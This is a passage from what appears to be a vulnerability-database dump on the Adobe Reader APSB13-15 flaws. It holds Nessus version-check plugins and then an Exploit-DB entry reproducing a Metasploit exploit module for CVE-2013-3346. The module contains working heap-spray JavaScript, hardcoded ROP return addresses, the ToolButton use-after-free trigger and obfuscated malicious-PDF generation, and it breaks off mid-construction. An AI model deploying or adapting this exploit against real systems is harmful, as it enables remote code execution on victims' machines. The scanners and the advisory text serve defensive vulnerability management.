attribute:\"synopsis\",\n value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Acrobat installed on the remote host is 
earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. 
(CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\npath = get_kb_item_or_exit('SMB/Acrobat/Path');\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe Acrobat\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:33", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. 
(CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66410", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66410);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n 
script_summary(english:\"Checks version of Adobe Reader\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. 
(CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) audit(AUDIT_KB_MISSING, 'SMB/Acroread/Version');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\n\nif (info2)\n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:50:36", "bulletinFamily": 
"scanner", "description": "The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to\n bypass the Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "MACOSX_ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66411", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66411);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 
59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-105\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-106\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-212\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an\n attacker to execute arbitrary code. 
(CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to\n bypass the Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - A flaw exists in the JavaScript API that allows an\n attacker to obtain sensitive information.\n (CVE-2013-2737)\n\n - An unspecified stack overflow condition exists that\n allows an attacker to execute arbitrary code.\n (CVE-2013-2724)\n\n - Multiple unspecified buffer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2730, CVE-2013-2733)\n\n - Multiple unspecified integer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists due to improper handling of operating\n system domain blacklists. An attacker can exploit this\n to have an unspecified impact. (CVE-2013-3342)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\"))\n audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (!get_kb_item(\"Host/MacOSX/Version\"))\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp = \"Adobe Reader\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5)\n)\n fix = \"9.5.5\";\nelse if (\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 
7)\n)\n fix = \"10.1.7\";\nelse if (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n fix = \"11.0.3\";\nelse\n fix = \"\";\n\nif (fix)\n{\n info =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:info, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T12:17:54", "bulletinFamily": "exploit", "description": "Adobe Reader ToolButton - Use After Free. CVE-2013-3346. Remote exploit for windows platform", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "id": "EDB-ID:30394", "href": "https://www.exploit-db.com/exploits/30394/", "type": "exploitdb", "title": "Adobe Reader ToolButton - Use After Free", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. 
At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 08 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status(\"Sending PDF...\")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n\r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n\r\n js = 
%Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape(\"%u0c0c\");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\r\n return;\r\n}\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\nvar executable = \"\";\r\nvar rop10 = unescape(\"#{rop_10}\");\r\nvar rop11 = unescape(\"#{rop_11}\");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n\r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n\r\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape(\"%u08e4%u0c0c\");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape(\"%ua8df%u4a82\");\r\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape(\"%u08a8%u0c0c\");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape(\"%u8003%u4a84\");\r\n} else {\r\n vulnerable = false;\r\n}\r\n\r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n\r\n var part1 = \"\";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\r\n }\r\n part1 += rop_addr;\r\n var part2 = \"\";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\r\n var arr = new Array();\r\n\r\n removeButtonFunc 
= function () {\r\n app.removeToolButton({\r\n cName: \"evil\"\r\n });\r\n\r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n\r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: \"xxx\",\r\n cExec: \"1\",\r\n cEnable: \"removeButtonFunc();\"\r\n });\r\n }\r\n\r\n app.addToolButton({\r\n cName: \"evil\",\r\n cExec: \"1\",\r\n cEnable: \"addButtonFunc();\"\r\n });\r\n}\r\n|\r\n\r\n js\r\n end\r\n\r\n def RandomNonASCIIString(count)\r\n result = \"\"\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n\r\n def ioDef(id)\r\n \"%d 0 obj \\n\" % id\r\n end\r\n\r\n def ioRef(id)\r\n \"%d 0 R\" % id\r\n end\r\n\r\n\r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = \"\"\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << \"#%x\" % c.unpack(\"C*\")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n\r\n\r\n def ASCIIHexWhitespaceEncode(str)\r\n result = \"\"\r\n whitespace = \"\"\r\n str.each_byte do |b|\r\n result << whitespace << \"%02x\" % b\r\n whitespace = \" \" * (rand(3) + 1)\r\n end\r\n result << \">\"\r\n end\r\n\r\n\r\n def make_pdf(js)\r\n xref = []\r\n eol = \"\\n\"\r\n endobj = \"endobj\" << eol\r\n\r\n # Randomize PDF version?\r\n pdf = \"%PDF-1.5\" << eol\r\n pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Catalog\") << eol\r\n pdf << nObfu(\"/OpenAction \") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu(\"/AcroForm \") << ioRef(6) << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol\r\n pdf << 
